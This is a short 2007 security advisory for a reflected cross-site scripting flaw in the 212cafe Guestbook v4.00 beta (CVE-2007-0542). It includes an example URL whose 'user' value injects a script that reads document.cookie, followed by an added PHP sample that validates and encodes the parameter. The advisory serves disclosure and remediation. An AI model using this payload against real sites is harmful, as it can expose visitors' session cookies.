Bug: XSS in Guestbook ( v.4.00 beta ) ( Ascii Version )


XSS in Guestbook ( v.4.00 beta )

Published : 2007.01.30
Credit : Linux_Drox
Risk : Low
CWE : CWE-79
CVE : CVE-2007-0542
Local : No
Remote : Yes

CVSS Base Score : 6.8/10
Impact Subscore : 6.4/10
Exploitability Subscore : 8.6/10
Exploit range : Remote
Attack complexity : Medium
Authentication : Not required
Confidentiality impact : Partial
Integrity impact : Partial
Availability impact : Partial

Hello

Vulnerable : Guestbook ( By 212cafe.com )
Version: v.4.00 beta
Web : http://www.212cafe.com

Exploit :
http://www.example.com/guestbookv4.0/show.php?user=[XSS]

Example :
http://www.example.com/guestbookv4.0/show.php?user='><script>alert(document.cookie);</script>

-----

Discovered By Linux_Drox
www.LeZr.Com/vb

Best Regards ,,,,
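
Added example, not part of the original advisory and not the Guestbook's own code (the source of show.php is not shown here): one way to validate and output-encode the `user` parameter. The leading `'>` in the example value suggests the parameter is reflected inside a single-quoted attribute, which is an assumption; `h`, `guestbook_user`, `render_user_link` and the name pattern are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: guestbook account names limited to these characters.
const USER_PATTERN = '/\A[A-Za-z0-9_-]{1,32}\z/';

/** Encode a value for an HTML text node or a quoted attribute (either quote style). */
function h(string $value): string
{
    // ENT_QUOTES is explicit because PHP before 8.1 defaulted to ENT_COMPAT,
    // which leaves ' unescaped and so does not stop a '> breakout.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Return the validated user name, or null if the parameter is missing or malformed. */
function guestbook_user(array $query): ?string
{
    $user = $query['user'] ?? null;
    // is_string() also rejects array input such as ?user[]=x
    if (!is_string($user) || preg_match(USER_PATTERN, $user) !== 1) {
        return null;
    }
    return $user;
}

/** Build a single-quoted link (the assumed reflection context) with encoding applied. */
function render_user_link(string $user): string
{
    return "<a href='show.php?user=" . h(rawurlencode($user)) . "'>" . h($user) . "</a>";
}

// Constructed inputs: one ordinary name and the example value from the advisory.
$samples = ['alice', "'><script>alert(document.cookie);</script>"];
foreach ($samples as $raw) {
    $user = guestbook_user(['user' => $raw]);
    if ($user === null) {
        // Validation rejects it; the echoed copy is still encoded before output.
        echo 'rejected: ', h($raw), PHP_EOL;
        continue;
    }
    echo render_user_link($user), PHP_EOL;
}
```

Validation and encoding are applied independently here, so a value that slips past the pattern is still rendered as inert text.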

Copyright 2014, cxsecurity.com